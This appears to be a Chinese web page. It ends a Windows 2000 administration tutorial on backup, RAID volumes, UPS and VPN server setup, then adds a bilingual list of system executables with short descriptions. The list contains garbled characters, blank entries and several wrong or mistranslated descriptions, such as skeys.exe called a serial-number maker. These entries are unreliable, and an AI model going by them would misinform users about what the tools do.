    备份程序为选择存储媒体提供了两个选项：
    可以将数据备份到存储设备上的一个文件。存储设备可以是硬盘、Zip 磁盘或任何类型的可以保存文件的可移动或不可移动媒体。该选项始终是可用的。可以将数据备份到磁带设备。该选项只有在用户的计算机安装了磁带设备后才可以使用。如果将数据备份到磁带设备，该媒体将由"可移动存储"管理。

步骤3 设置备份选项
    "备份"提供了一个"选项"对话框，可以使用该对话框自定义备份操作。使用"选项"对话框可以：
    选择备份类型。备份类型包括：副本、每日、差异、增量和普通。
    选择是否需要日志文件记录备份操作。如果选择了该选项，还可以选择需要完整的日志文件还是摘要日志文件。选择是否需要备份存储在已装入驱动器中的数据。
    指定要排除在备份操作之外的文件类型。选择是否需要验证数据备份的正确性。
    步骤4 开始备份如图 13.11

开始备份操作时，"备份"会提示用户输入有关该备份作业的信息，并允许用户设置高级备份选项。在提供了信息或更改了备份选项之后，备份程序将开始备份选定的文件和文件夹。
    即使用户已计划该备份操作在无人参与的情况下运行，程序仍会提示用户输入有关备份作业的信息。不过，在用户提供了信息后，"备份"不会立即开始备份文件，而是将计划好的备份加入任务计划程序。

    注意：用户可以使用"备份"在 FAT 或 NTFS 卷上备份和还原数据。但是，如果已经备份的数据来自 Windows 2000 使用的 NTFS 卷，建议用户仍将数据还原到 Windows 2000 使用的 NTFS 卷，否则会丢失数据以及部分文件和文件夹特性。例如，如果从 Windows 2000 中使用的 NTFS 卷中备份数据，然后还原到 Windows NT 4.0 下的 FAT 卷或 NTFS 卷中，将可能丢失权限、加密文件系统 (EFS) 设置、磁盘配额信息、已装入驱动器信息和远程存储信息。

13.2.3 使用批处理文件备份数据
    可以使用带有各种命令行参数的 "ntbackup" 命令从批处理文件中执行备份操作。然而，在使用批处理文件备份数据时有两个重要的限制条件：
§　使用 "ntbackup" 命令只能备份整个文件夹。不能指派单个文件进行备份。但是，用户可以从命令行中指派备份选项文件 (.bks file)，命令行中包含要备份的文件的列表。要创建备份选项文件，必须使用备份实用程序的 GUI 版本。
§　"ntbackup" 命令不支持使用通配符。例如，键入 "*.txt" 将不会备份扩展名为 .txt 的文件。

13.2.4 还原文件和文件夹
    以下四个步骤描述了简单的还原操作：
    步骤1 选择要还原的文件和文件夹
    "备份"为用户提供了已备份文件和文件夹的树状视图，可以通过该树状视图选择要还原的文件和文件夹。用户可以像使用 Windows 资源管理器一样使用此树状视图来打开驱动器和文件夹并选择文件。
    步骤2 选择备份文件和文件夹要还原到的位置。
    "备份"允许为被还原的文件选择三个目的地中的一个：
    将备份数据还原到数据的原始文件或文件夹。如果还原已损坏或丢失的文件和文件夹，可以使用该选项。
    将备份数据还原到备用文件夹。如果选择该选项，则备份文件夹和文件的结构将保留在备用文件夹中。如果将来可能需要一些旧文件，但是不希望覆盖或更改磁盘上的任何当前文件或文件夹，可以使用该选项。
    将备份文件还原到单个文件夹。该选项不保留备份文件夹和文件的结构。备份文件位被放在一个文件夹中。如果在搜索文件时不知道它的位置，可以使用该选项。

步骤3 设置还原选项
    "备份"在"选项"对话框中提供了"还原"选项卡，在此处可以选择文件和文件夹的还原方式。必须在三个选项中选择一个：
§　"不要替换本机上的文件"。这就可以避免覆盖硬盘上的文件。它是还原文件最安全的方法。
§　"仅当磁盘上的文件是旧的情况下，替换文件"。如果自从上次备份数据以来做了任何更改，这将确保对文件所做的更改不会丢失。
§　"无条件替换本机上的文件"。这将用备份集中的文件替换硬盘上的所有文件。如果自从上次备份数据以来做了任何更改，该选项将删除这些更改。
    步骤4 开始还原操作如图 13.12

开始还原操作后，"备份"将要求用户确认已准备好还原数据。还可以设置高级还原选项，包括：是否要还原安全设置、可移动存储数据库和交接点数据。
    注意：
    用户可以使用"备份"在 FAT 或 NTFS 卷上备份和还原数据。但是，如果已经备份的数据来自 Windows 2000 使用的 NTFS 卷，建议用户仍将数据还原到 Windows 2000 使用的 NTFS 卷，否则会丢失数据以及部分文件和文件夹特性。例如，如果从 Windows 2000 中使用的 NTFS 卷中备份数据，然后还原到 Windows NT 4.0 下的 FAT 卷或 NTFS 卷中，将可能丢失权限、加密文件系统 (EFS) 设置、磁盘配额信息、已装入驱动器信息和远程存储信息。

    13.3 设备容错
    13.3.1 使用 RAID
§　创建镜像卷
    步骤1 打开磁盘管理。
    步骤2 右键单击要创建镜像卷的动态磁盘上的未分配空间，然后单击"创建卷"。
    步骤3 在创建卷向导中，单击"下一步"，单击"镜像卷"，然后按屏幕上的指令操作。
    注意：
§　至少需要两个动态磁盘才能创建镜像卷。
§　镜像卷具备容错能力。
§　镜像卷不能扩展或者分成带区。
§　镜像卷的两个副本（镜像）使用相同的驱动器号。

§　创建 RAID-5 卷
    步骤1 打开磁盘管理。
    步骤2 右键单击要创建 RAID-5 卷的动态磁盘上的未分配空间，然后单击"创建卷"。
    步骤3 在创建卷向导中，单击"下一步"，单击"RAID-5 卷"，然后按屏幕上的指令操作。

13.3.2 UPS 设备的使用

    应该将以下 Windows 服务与为计算机所选择的不间断电源 (UPS) 设备相结合使用：UPS、报警器、信使和事件日志。其他建议，请参阅最佳操作。要配置 UPS 设备，请在"控制面板"中，单击"UPS"。应该根据所使用的 UPS 设备支持的特性来进行配置。Windows 2000 支持的三种特性是：
§　主电源故障检测。
§　电量不足检测。
§　UPS 关闭功能。
    要确定正确的设置，请仔细阅读 UPS 设备的用户手册或与制造商联系。根据 UPS 支持特性的不同，可能需要在"UPS"对话框中的"UPS 特征"下输入其他设置。可以以几种方法控制 UPS 服务。一种方法是在"UPS"对话框中配置设置。显示消息并询问是否需要启动 UPS 设备。另一种启动设备的方法是单击"控制面板"中的"服务"。

    13.4 Windows 2000 虚拟专用网络
    13.4.1 什么是虚拟专用网络 (VPN)？
    虚拟专用网络 (VPN) 是专用网络的延伸，它包含了类似 Internet 的共享或公共网络链接。通过 VPN 可以以模拟点对点专用链接的方式通过共享或公共网络在两台计算机之间发送数据。虚拟专用联网是创建和配置虚拟专用网络的行为。
    要模拟点对点链路，应压缩或包装数据，并加上一个提供路由信息的报头，该报头使数据能够通过共享或公用网络到达其终点。要模拟专用链路，为保密起见应加密数据。不用密钥，从共享或者公共网络截取的数据包是很难解密的。封装和加密专用数据之处的链接是虚拟专用网络 (VPN) 连接。
    通过远程访问和路由连接，组织可以使用 VPN 连接将长途拨号或租用线路换成本地拨号或者到 Internet 服务提供者（ISP）的租用线路。
    在 Windows 2000 中有两种类型的 VPN 技术：
1. 点对点隧道协议 (PPTP)
对于数据加密，PPTP 使用用户级的点到点协议 (PPP) 身份验证方法及 Microsoft 点到点加密 (MPPE)。
2. 带有 IP 协议安全 (IPSec) 的第二层隧道协议 (L2TP)
L2TP 使用用户级 PPP 身份验证方法和带有 IPSec 数据加密的机器级证书。

13.4.2 Windows 2000 中虚拟专用网络的新特性
    Windows 2000 为虚拟专用网络提供下列新功能：
§　第二层隧道协议
    除了点对点隧道协议 (PPTP) 之外，Windows 2000 包含行业标准"第二层隧道协议 (L2TP)"，该协议用于与 Windows 2000 网际协议安全 (IPSec) 连接以创建安全的虚拟专用网络连接。
§　远程访问策略
    远程访问策略是一套条件和连接设置，可在设置远程访问权限和连接属性方面向网络管理员提供更大的灵活性。通过远程访问策略，可以强制对 VPN 用户使用强大的身份验证和加密，以及对拨号用户使用一组不同的身份验证和加密约束。

§　MS-CHAP 版本 2
    Microsoft Challenge Handshake Authentication Protocol (MS-CHAP) 版本 2 在远程访问连接的协商过程中主要加强传递安全凭证的安全性和加密关键字生成。MS-CHAP 特别设计版本 2 来身份验证虚拟专用网络连接。
§　可扩展的身份验证协议
    可扩展身份验证协议 (EAP) 允许将新的身份验证方法用于远程访问，远程访问特性对基于智能卡的安全部署尤其重要。EAP 是允许其他身份验证模块插入 Windows 2000 远程访问 PPP 设备的接口。Windows 2000 支持 EAP-MD5 CHAP, EAP-TLS（用于智能卡和基于证书的身份验证），以及将 EAP 消息传送到 RADIUS 服务器。
§　帐户锁定
    帐户锁定是一项安全的性能，它在配置号码对身份验证失败后拒绝访问。帐户锁定用于防止那种借助词典进行的攻击。借助词典进行攻击是指非法用户企图使用已知的用户名，再用词典里的常用单词列表作为密码尝试登录。帐户锁定在默认情况下是禁用的。

13.4.3 虚拟专用网络组件
    Windows 2000 VPN 的连接包括下列组件：
§　VPN 服务器
    接受 VPN 客户 VPN 连接的计算机。
§　VPN 客户
    将 VPN 连接初始化为 VPN 服务器的计算机。VPN 客户可能是一台单独的计算机，也可能是路由器。
§　隧道
    连接中封装数据的部分。
§　VPN 连接
    连接中加密数据的部分。对典型的安全 VPN 连接，数据沿连接的相同部分进行加密和压缩。
§　隧道协议
    用来管理隧道及压缩专用数据的协议。要成为 VPN 连接，隧道传输的数据也必须加密。Windows 2000 包括 PPTP 和 L2TP 信道协议。

§　隧道数据
数据经常在专用点对点的链接间发送。
§　传输互联网络
压缩数据所通过的、共享的或公共的网络。对 Windows 2000，传输互联网络通常是 IP 网络。传输互联网络可以是 Internet 或基于 IP 的专用 intranet。
  如图 13.13显示虚拟专用网络的组成。

13.4.4 VPN 服务器的通用配置
    下面让用户举例说明如何配置VPN服务器。假设要为 Electronic, Inc. 部署 VPN，网络管理员将进行分析并作出相关的设计决定：
§　网络配置
§　远程访问策略配置
§　域配置
§　安全配置

13.4.4.1 网络配置
    网络配置的关键要点是：
    Electronic, Inc. intranet 使用带有 255.240.0.0 子网掩码的 172.16.0.0 和带有 255.255.0.0 子网掩码的 192.168.0.0 的专用网络。企业校园网段使用子网 172.16.0.0 而分支办公室使用子网 192.168.0.0。
    VPN 服务器计算机通过使用 T3（也叫 DS-3）专用 WAN 链接可以直接连接到 Internet。
    Internet 上 WAN 适配器的 IP 地址是 207.46.130.1，由 Electronic, Inc. 公司的 Internet 服务提供商 (ISP)

分配。WAN 适配器的 IP 地址是指 Internet 上域名为 vpn.electronic.nt2000.com。VPN 服务器计算机直接与 intranet 网段连接，此网段包含 RADIUS 服务器、商业伙伴访问的文件和 Web 服务器以及连接到 Electronic, Inc. 公司企业园 intranet 其余部分的路由器。intranet 网络节段的 IP 网络 ID 是 172.31.0.0，子网掩码是 255.255.0.0。 使用 IP 地址静态池配置 VPN 服务器计算机以分配远程访问客户端和呼叫路由器。
    如图13.14显示 Electronic, Inc. VPN 服务器的网络配置。

根据 Electronic, Inc. 的企业校园 intranet 网络配置，VPN 服务器计算机如下配置。
    1. 在 VPN 服务器中安装硬件
    根据适配器制造商的说明，将安装用于连接 intranet 段的网卡和用于连接 Internet 的 WAN 适配器。安装并运行驱动程序后，则适配器将作为本地连接显示在 Network 和 Dial-up Connections 文件夹中。
    2. 配置 LAN 和 WAN 适配器上的 TCP/IP
    对于 LAN 适配器，配置子网掩码为 255.255.0.0 的 IP 地址 172.31.0.1。对 WAN 适配器，配置子网掩码为 255.255.255.255 的 IP 地址 207.46.130.1。对于每个适配器来说，不配置默认网关。DNS 和 WINS 服务器地址也同时被配置。
    3. 安装路由和远程访问服务
    运行"路由选择和远程访问安装"向导。在向导内启用远程访问和 LAN 以及 WAN 路由，所有端口都可以进行路由和远程访问，并且 L2TP 连接需要 IPSec 加密。
    在向导内将配置 IP 地址从 172.31.255.1 到 172.31.255.254 的静态 IP 地址池。这将创建最多 253 个 VPN 客户端的静态地址池。
    4. 启用 EAP 身份验证方法
    如果允许使用基于智能卡的远程访问 VPN 客户和基于证书的呼叫路由器，网络管理员应该启用 VPN 上的"可扩展身份验证协议"。
    5. 配置静态路由以访问 intranet 和 Internet 站点
    要到达 intranet 位置，请用以下设置配置静态路由：

接口：连接到 intranet 的 LAN 适配器
目标： 172.16.0.0
子网掩码： 255.240.0.0
网关： 172.31.0.2
跃点数： 1
    要到达 Internet 位置，请用以下设置配置静态路由：
接口：WAN 适配器与 Internet 连接
目标： 0.0.0.0
子网掩码： 0.0.0.0
网关： 0.0.0.0
跃点数： 1
    注意：因为 WAN 适配器创建了与 ISP 的点对点连接，任何地址都可以输入到网关中。例如网关地址 0.0.0.0。0.0.0.0 是未指定的 IP 地址。
    6. 增加 PPTP 和 L2TP 端口的数目
    默认情况下，只有 5 个 L2TP 端口和 5 个 PPTP 端口可启用 VPN 连接。将 L2TP 和 PPTP 端口数增加到 253。
    7. 在 IPSec 数据包筛选器上配置 PPTP 和 L2TP
    IPSec 数据包筛选器上的 PPTP 和 L2TP 都配置在连接到 Internet 的 WAN 适配器上。

13.4.4.2 远程访问策略配置
    为了从 Windows NT 4.0 环境中轻松过渡过来，Electronic, Inc. 的网络管理员决定采用由用户访问的管理模型。远程访问通过将单个用户帐户的拨入权限设置为"允许访问"或"禁止访问"来控制。远程访问策略被用于应用基于组成员关系的不同的 VPN 连接设置，而名为"如果拨入权限启用就允许访问"的默认远程访问策略将被删除。
    13.4.4.3 域配置
    要利用对不同类型地 VNP 连接应用不同的连接设置的功能，请创建以下 Windows 2000 组：
§　VPN_ 用户
    用于远程访问 VPN 连接
§　VPN_ 路由器
    用于从 Electronic 公司分支机构的路由器-路由器 VPN 连接
§　VPN_ 合作者
    用于从 Electronic 公司业务伙伴的路由器-路由器 VPN 连接
    Electronic, Inc. 拥有一个混合模式的域。
    13.4.4.4 安全性配置
    要启用通过 IPSec 的 L2TP 连接、远程客户使用智能卡以及路由器使用 EAP-TLS，请将 Electronic, Inc. 域配置为自动注册所有域成员的机器证书。

返回


windows 2000/XP/2003服务全集

《一键清理系统垃圾》

windows 2000/XP/2003服务全集

secedit.exe > Starts Security Editor help 自动安全性配置管理
services.exe > Controls all the services 控制所有服务
sethc.exe > Set High Contrast - changes colours and display mode Logoff to set it back to normal 设置高对比
setreg.exe > Shows the Software Publishing State Key values 显示软件发布的国家语言
setup.exe > GUI box prompts you to goto control panel to configure system components 安装程序（转到控制面板）
setver.exe > Set Version for Files 设置 MS-DOS 子系统向程序报告的 MS-DOS 版本号
sfc.exe > System File Checker test and check system files for integrity 系统文件检查
sfmprint.exe > Print Services for Macintosh 打印Macintosh服务
sfmp***e.exe >
sfmsvc.exe >
shadow.exe > Monitor another Terminal Services session. 监控另外一台中端服务器会话
share.exe > Windows 2000 和 MS-DOS 子系统不使用该命令。接受该命令只是为了与 MS-DOS 文件兼容
shmgrate.exe >
shrpubw.exe > Create and Share folders 建立和共享文件夹
sigverif.exe > File Signature Verification 文件签名验证
skeys.exe > Serial Keys utility 序列号制作工具
smlogsvc.exe > Performance Logs and Alerts 性能日志和警报
smss.exe >
sndrec32.exe > starts the Windows Sound Recorder 录音机
sndvol32.exe > Display the current volume information 显示声音控制信息
snmp.exe > Simple Network Management Protocol used for Network Mangement 简单网络管理协议
snmptrap.exe > Utility used with SNMP SNMP工具
sol.exe > Windows Solitaire Game 纸牌
sort.exe > Compares files and Folders 读取输入、排序数据并将结果写到屏幕、文推渌璞干?
SPOOLSV.EXE > Part of the spooler service for printing 打印池服务的一部分
sprestrt.exe >
srvmgr.exe > Starts the Windows Server Manager 服务器管理器
stimon.exe > WDM StillImage- > Monitor
stisvc.exe > WDM StillImage- > Service
subst.exe > Associates a path with a drive letter 将路径与驱动器盘符关联
svchost.exe > Svchost.exe is a generic host process name for services that are run from dynamic-link
libraries (DLLs). DLL得主进程
syncapp.exe > Creates Windows Briefcase. 创建Windows文件包
sysedit.exe > Opens Editor for 4 system files 系统配置编辑器
syskey.exe > Encrypt and secure system database NT账号数据库按群工具
sysocmgr.exe > Windows 2000 Setup 2000安装程序
systray.exe > Starts the systray in the lower right corner. 在低权限运行systray
taskman.exe > Task Manager 任务管理器
taskmgr.exe > Starts the Windows 2000 Task Manager 任务管理器
tcmsetup.exe > telephony client wizard 电话服务客户安装
tcpsvcs.exe > TCP Services TCP服务
.exe > Telnet Utility used to connect to Telnet Server
termsrv.exe > Terminal Server 终端服务
tftp.exe > Trivial FTP 将文件传输到正在运行 TFTP 服务的远程计算机或从正在运行 TFTP 服务的远程计算机传输文件
tftpd.exe > Trivial FTP Daemon
themes.exe > Change Windows Themes 桌面主题
tlntadmn.exe > Telnet Server Administrator Telnet服务管理
tlntsess.exe > Display the current Telnet Sessions 显示目前的Telnet会话
tlntsvr.exe > Start the Telnet Server 开始Telnet服务
tracert.exe > Trace a route to display paths 该诊断实用程序将包含不同生存时间 (TTL) 值的 Internet 控制消
息协议 (ICMP) 回显数据包发送到目标，以决定到达目标采用的路由
tsadmin.exe > Terminal Server Administrator 终端服务管理器
tscon.exe > Attaches a user session to a terminal session. 粘贴用户会话到终端对话
tsdiscon.exe > Disconnect a user from a terminal session 断开终端服务的用户
tskill.exe > Kill a Terminal server process 杀掉终端服务
tsprof.exe > Used with Terminal Server to query results. 用终端服务得出查询结果
tsshutdn.exe > Shutdown the system 关闭系统
unlodctr.exe > Part of performance monitoring 性能监视器的一部分
upg351db.exe > Upgrade a jet database 升级Jet数据库
ups.exe > UPS service UPS服务
user.exe > Core Windows Service Windows核心服务
userinit.exe > Part of the winlogon process Winlogon进程的一部分
usrmgr.exe > Start the windows user manager for domains 域用户管理器
utilman.exe > This tool enables an administrator to designate which computers automatically open
accessibility tools when Windows 2000 starts. 指定2000启动时自动打开那台机器
verifier.exe > Driver Verifier Manager Driver Verifier Manager
vwipxspx.exe > Loads IPX/SPX VDM 调用IPX/SPX VDM
w32tm.exe > Windows Time Server 时间服务器
wextract.exe > Used to extract windows files 解压缩Windows文件
winchat.exe > Opens Windows Chat 打开Windows聊天
winhlp32.exe > Starts the Windows Help System 运行帮助系统
winlogon.exe > Used as part of the logon process. Logon进程的一部分
winmine.exe > windows Game 挖地雷
winmsd.exe > Windows Diagnostic utility 系统信息
wins.exe > Wins Service Wins服务
winspool.exe > Print Routing 打印路由
winver.exe > Displays the current version of Windows 显示Windows版本
wizmgr.exe > Starts Windows Administration Wizards Windows管理向导
wjview.exe > Command line loader for Java 命令行调用Java
wowdeb.exe > . For starters, the 32-bit APIs require that the WOWDEB.EXE task runs in the target
debugee‘s VM 启动时，32位API需要
wowexec.exe > For running Windows over Windows Applications 在Windows应用程序上运行Windows
wpnpinst.exe > ?
write.exe > Starts MS Write Program 写字板
wscript.exe > Windows Scripting Utility 脚本工具
wupdmgr.exe > Starts the Windows update Wizard (Internet) 运行Windows升级向导
xcopy.exe > Used to copy directories 复制文件和目录，包括子目录
注：还有一些内部命令，参见2000的帮助文件，都是中文，大家自己看看吧

mountvol.exe > Creates, deletes, or lists a volume mount point. 创建、删除或列出卷的装入点。
mplay32.exe > MS Media Player 媒体播放器
mpnotify.exe > Multiple Provider Notification application 多提供者通知应用程序
mq1sync.exe >
mqbkup.exe > MS Message Queue Backup and Restore Utility 信息队列备份和恢复工具
mqexchng.exe > MSMQ Exchange Connector Setup 信息队列交换连接设置
mqmig.exe > MSMQ Migration Utility 信息队列迁移工具
mqsvc.exe > ?
mrinfo.exe > Multicast routing using SNMP 使用SNMP多点传送路由
mscdexnt.exe > Installs MSCD (MS CD Extensions) 安装MSCD
msdtc.exe > Dynamic Transaction Controller Console 动态事务处理控制台
msg.exe > Send a message to a user local or remote. 发送消息到本地或远程客户
mshta.exe > HTML Application HOST HTML应用程序主机
msiexec.exe > Starts Windows Installer Program 开始Windows安装程序
mspaint.exe > Microsoft Paint 画板
msswchx.exe >
mstask.exe > Task Schedule Program 任务计划表程序
mstinit.exe > Task scheduler setup 任务计划表安装
narrator.exe > Program will allow you to have a narrator for reading. Microsoft讲述人
nbtstat.exe > Displays protocol stats and current TCP/IP connections using NBT 使用 NBT
（TCP/IP 上的 NetBIOS）显示协议统计和当前 TCP/IP 连接。
nddeapir.exe > NDDE API Server side NDDE API服务器端
net.exe > Net Utility 详细用法看/？
net1.exe > Net Utility updated version from MS Net的升级版
netdde.exe > Network DDE will install itself into the background 安装自己到后台
netsh.exe > Creates a shell for network information 用于配置和监控 Windows 2000 命令行脚本接口。
netstat.exe > Displays current connections. 显示协议统计和当前的 TCP/IP 网络连接。
nlsfunc.exe > Loads country-specific information 加载特定国家（地区）的信息。Windows 2000 和 MS-DOS 子系统不使用该命令。接受该命令只是为了与 MS-DOS 文件兼容。
notepad.exe > Opens Windows 2000 Notepad 记事本
nslookup.exe > Displays information for DNS 该诊断工具显示来自域名系统 (DNS) 名称服务器的信息。
ntbackup.exe > Opens the NT Backup Utility 备份和故障修复工具
ntbooks.exe > Starts Windows Help Utility 帮助
ntdsutil.exe > Performs DB maintenance of the ADSI 完成ADSI的DB的维护
ntfrs.exe > NT File Replication Service NT文件复制服务
ntfrsupg.exe >
ntkrnlpa.exe > Kernel patch 核心补丁
ntoskrnl.exe > Core NT Kernel KT的核心
ntsd.exe >
ntvdm.exe > Simulates a 16-bit Windows environment 模拟16位Windows环境
nw16.exe > Netware Redirector NetWare转向器
nwscript.exe > runs netware scripts 运行Netware脚本
odbcad32.exe > ODBC 32-bit Administrator 32位ODBC管理
odbcconf.exe > Configure ODBC driver‘s and data source‘s from command line 命令行配置ODBC驱动和数据源
os2.exe > An OS/2 Warp Server (os2 /o) OS/2
os2srv.exe > An OS/2 Warp Server OS/2
os2ss.exe > An OS/2 Warp Server OS/2
osk.exe > On Screen Keyboard 屏幕键盘
packager.exe > Windows 2000 Packager Manager 对象包装程序
pathping.exe > Combination of Ping and Tracert 包含Ping和Tracert的程序
pax.exe > is a POSIX program and path names used as arguments must be specified in POSIX
format. Use "//C/Users/Default" instead of "C:\USERS\DEFAULT." 启动便携式存档互换 (Pax) 实用程序
pentnt.exe > Used to check the Pentium for the floating point division error. 检查Pentium的浮点错误
perfmon.exe > Starts Windows Performance Monitor 性能监视器
ping.exe > Packet Internet Groper 验证与远程计算机的连接
posix.exe > Used for backward compatibility with Unix 用于兼容Unix
print.exe > Cmd line used to print files 打印文本文件或显示打印队列的内容。
progman.exe > Program manager 程序管理器
proquota.exe > Profile quota program
psxss.exe > POSIX Subsystem Application Posix子系统应用程序
qappsrv.exe > Displays the available application terminal servers on the network在网络上显示终端服务器可用的程序
qprocess.exe > Display information about processes local or remote 在本地或远程显示进程的信息（需终端服务）
query.exe > Query TERMSERVER user process and sessions 查询进程和对话
quser.exe > Display information about a user logged on 显示用户登陆的信息（需终端服务）
qwinsta.exe > Display information about Terminal Sessions. 显示终端服务的信息
rasadmin.exe > Start the remote access admin service 启动远程访问服务
rasautou.exe > Creates a RAS connection 建立一个RAS连接
rasdial.exe > Dial a connection 拨号连接
rasphone.exe > Starts a RAS connection 运行RAS连接
rcp.exe > Copies a file from and to a RCP service. 在 Windows 2000 计算机和运行远程外壳端口监控程序rshd 的系统之间复制文件
rdpclip.exe > RdpClip allows you to copy and paste files between a terminal session and client
console session. 再终端和本地复制和粘贴文件
recover.exe > Recovers readable information from a bad or defective disk 从坏的或有缺陷的磁盘中恢复可读取的信息。
redir.exe > Starts the redirector service 运行重定向服务
regedt32.exe > 32-bit register service 32位注册服务
regini.exe > modify registry permissions from within a script 用脚本修改注册许可
register.exe > Register a program so it can have special execution characteristics. 注册包含特殊运行字符的程序
regsvc.exe >
regsvr32.exe > Registers and unregister‘s dll‘s. As to how and where it register‘s them I dont know 注册和反注册DLL
regtrace.exe > Options to tune debug options for applications failing to dump trace statements Trace 设置
regwiz.exe > Registration Wizard 注册向导
remrras.exe >
replace.exe > Replace files 用源目录中的同名文件替换目标目录中的文件。
reset.exe > Reset an active section 重置活动部分
rexec.exe > Runs commands on remote hosts running the REXEC service. 在运行 REXEC 服务的远程计算机上运行命令。rexec 命令在执行指定命令前，验证远程计算机上的用户名，只有安装了 TCP/IP 协议后才可以使用该命令。
risetup.exe > Starts the Remote Installation Service Wizard. 运行远程安装向导服务
route.exe > display or edit the current routing tables. 控制网络路由表
routemon.exe > no longer supported 不再支持了！
router.exe > Router software that runs either on a dedicated DOS or on an OS/2 system. Route软件在DOS或者是OS/2系统
rsh.exe > Runs commands on remote hosts running the RSH service 在运行 RSH 服务的远程计算机上运行命令
rsm.exe > Mounts and configures remote system media 配置远程系统媒体
rsnotify.exe > Remote storage notification recall 远程存储通知回显
rsvp.exe > Resource reservation protocol 源预约协议
runas.exe > RUN a program as another user 允许用户用其他权限运行指定的工具和程序
rundll32.exe > Launches a 32-bit dll program 启动32位DLL程序
runonce.exe > Causes a program to run during startup 运行程序再开始菜单中
rwinsta.exe > Reset the session subsystem hardware and software to known initial values 重置会话子系统硬件和软件到最初的值
savedump.exe > Does not write to e:\winnt\user.dmp 不写入User.dmp中
scardsvr.exe > Smart Card resource management server 子能卡资源管理服务器
schupgr.exe > It will read the schema update files (.ldf files) and upgrade the schema. (part of ADSI) 读取计划更新文件和更新计划
accwiz.exe > Accessibility Wizard for walking you through setting up your machine for your mobility needs. 辅助工具向导
acsetups.exe > ACS setup DCOM server executable
actmovie.exe > Direct Show setup tool 直接显示安装工具
append.exe > Allows programs to open data in specified directories as if they were in the current
directory. 允许程序打开制定目录中的数据
arp.exe > NETWORK Display and modify IP - Hardware addresses 显示和更改计算机的IP与硬件物理地址的对应列表
at.exe > AT is a scheduling utility also included with UNIX 计划运行任务
atmadm.exe > Displays statistics for ATM call manager. ATM调用管理器统计
attrib.exe > Display and modify attributes for files and folders 显示和更改文件和文件夹属性
autochk.exe > Used to check and repair Windows File Systems 检测修复文件系统
autoconv.exe > Automates the file system conversion during reboots 在启动过程中自动转化系统
autofmt.exe > Automates the file format process during reboots 在启动过程中格式化进程
autolfn.exe > Used for formatting long file names 使用长文件名格式
bootok.exe > Boot acceptance application for registry
bootvrfy.exe > Bootvrfy.exe, a program included in Windows 2000 that notifies the system that startup
was successful. Bootvrfy.exe can be run on a local or remote computer. 通报启动成功
cacls.exe > Displays or modifies access control lists (ACLs) of files. 显示和编辑ACL
calc.exe > Windows Calculators 计算器
cdplayer.exe > Windows CD Player CD播放器
change.exe > Change { User | Port | Logon } 与终端服务器相关的查询
charmap.exe > Character Map 字符映射表
chglogon.exe > Same as using "Change Logon" 启动或停用会话记录
chgport.exe > Same as using "Change Port" 改变端口（终端服务）
chgusr.exe > Same as using "Change User" 改变用户（终端服务）
chkdsk.exe > Check the hard disk for errors similar to Scandisk 3 Stages must specify a Drive Letter 磁盘检测程序
chkntfs.exe > Same as using chkdsk but for NTFS NTFS磁盘检测程序
cidaemon.exe > Component of Ci Filer Service 组成Ci文档服务
cipher.exe > Displays or alters the encryption of directories [files] on NTFS partitions.在NTFS上显示或改变加密的文件或目录
cisvc.exe > Content Index -- It‘s the content indexing service for I 索引内容
ckcnv.exe > Cookie Convertor 变换Cookie
cleanmgr.exe > Disk Cleanup, popular with Windows 98 磁盘清理
cliconfg.exe > SQL Server Client Network Utility SQL客户网络工具
clipbrd.exe > Clipboard viewer for Local will allow you to connect to other clipboards 剪贴簿查看器
clipsrv.exe > Start the clipboard Server 运行Clipboard服务
clspack.exe > CLSPACK used to create a file listing of system packages 建立系统文件列表清单
cluster.exe > Display a cluster in a domain 显示域的集群
_cmd_.exe > Famous command prompt 没什么好说的！
cmdl32.exe > Connection Manager Auto-Download 自动下载连接管理
cmmgr32.exe > Connection Manager 连接管理器
cmmon32.exe > Connection Manager Monitor 连接管理器监视
cmstp.exe > Connection Manager Profile Manager 连接管理器配置文件安装程序
comclust.exe > about cluster server 集群
comp.exe > ComClust Add, Remove, or Join a cluster. 比较两个文件和文件集的内容＊
compact.exe > Displays or alters the compression of files on NTFS partitions. 显示或改变NTFS分区上文件的压缩状态
conime.exe > Console IME IME控制台
control.exe > Starts the control panel 控制面板
convert.exe > Convert File System to NTFS 转换文件系统到NTFS
convlog.exe > Converts MS IIS log files 转换IIS日志文件格式到NCSA格式
cprofile.exe > Copy profiles 转换显示模式
cscript.exe > MS Windows Scripts Host Version 5.1 较本宿主版本
csrss.exe > Client Server Runtime Process 客户服务器Runtime进程
csvde.exe > Comma Separated Variable Import/Export Utility 日至格式转换程序
dbgtrace.exe > 和Terminal Server相关
dcomcnfg.exe > Display the current DCOM configuration. DCOM配置属性
dcphelp.exe > ?
dcpromo.exe > Promote a domain controller to ADSI AD安装向导
ddeshare.exe > Display DDE shares on local or remote computer DDE共享
ddmprxy.exe >
debug.exe > Runs Debug, a program testing and editing tool. 就是DEBUG啦！
dfrgfat.exe > Defrag FAT file system FAT分区磁盘碎片整理程序
dfrgntfs.exe > Defrag NTFS file system NTFS分区磁盘碎片整理程序
dfs_cmd_.exe > configures a Dfs tree 配置一个DFS树
dfsinit.exe > Distributed File System Initialization 分布式文件系统初始化
dfssvc.exe > Distributed File System Server 分布式文件系统服务器
diantz.exe > MS Cabinet Maker 制作CAB文件
diskperf.exe > Starts physical Disk Performance counters 磁盘性能计数器
dllhost.exe > dllhost is used on all versions of Windows 2000. dllhost is the hedost process for all COM+ applications. 所有COM+应用软件的主进程
dllhst3g.exe >
dmadmin.exe > Disk Manager Service 磁盘管理服务
dmremote.exe > Part of disk management 磁盘管理服务的一部分
dns.exe > DNS Applications DNS
doskey.exe > recalls Windows command lines and creates macros 命令行创建宏
dosx.exe > DOS Extender DOS扩展
dplaysvr.exe > Direct Play Helper 直接运行帮助
drwatson.exe > Dr Watson for 2000 Fault Detector 华生医生错误检测
drwtsn32.exe > Dr Watson for 2000 viewer and configuration manager 华生医生显示和配置管理
dtcsetup.exe > Installs MDTC
dvdplay.exe > Windows 2000 DVD player DVD播放
dxdiag.exe > Direct-X Diagnostics Direct-X诊断工具
edlin.exe > line-oriented text editor. 命令行的文本编辑器（历史悠久啊！）
edlin.exe > line-oriented text editor. 命令行的文本编辑器（历史悠久啊！）
esentutl.exe > MS Database Utility MS数据库工具
eudcedit.exe > Private character editor Ture Type造字程序
eventvwr.exe > Windows 2000 Event Viewer 事件查看器
evnt_cmd_.exe > Event to trap translator; Configuration tool
evntwin.exe > Event to trap translator setup
exe2bin.exe > Converts EXE to binary format 转换EXE文件到二进制
expand.exe > Expand Files that have been compressed 解压缩
extrac32.exe > CAB File extraction utility 解CAB工具
